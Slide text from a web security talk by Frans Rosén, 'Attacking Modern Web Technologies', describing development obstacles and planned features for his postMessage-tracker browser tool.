postMessage-tracker Speedbumps
• Problem 2: jQuery-wrapping, such a mess (diff btw version)
Before:
Attacking Modern Web Technologies
Author name her
Frans Rosén @fransrosen

postMessage-tracker Speedbumps
• Problem 2: jQuery-wrapping, such a mess (diff btw version)
Before: After:

Solution: Use either ._data, .expando or .events from jQuery object!


Attacking Modern Web Technologies
Author name her
Frans Rosén @fransrosen

postMessage-tracker Speedbumps
• Problem 3: Anonymous functions. Could not identify them at all.
Before:
Attacking Modern Web Technologies
Author name her
Frans Rosén @fransrosen

postMessage-tracker Speedbumps
• Problem 3: Anonymous functions. Could not identify them at all.
Before: After:

Solution: Can’t extract using Function.toString() in Chrome :(


Will however at least show them as tracked now
Attacking Modern Web Technologies
Author name her
Frans Rosén @fransrosen

postMessage-tracker released?
No :( I suck. "Soon"?
Attacking Modern Web Technologies
Author name her
Frans Rosén @fransrosen

postMessage-tracker released?
No :( I suck. "Soon"?
Want to complete more features!
Attacking Modern Web Technologies
Author name her
Frans Rosén @fransrosen

postMessage-tracker released?
No :( I suck. "Soon"?
Want to complete more features!
• Trigger debugger to breakpoint messages (since we own the order)
• Try to see if .origin is being used and how
• If regex, run through Rex!
detectify That’s it!

Frans Rosén (@fransrosen)

You might also like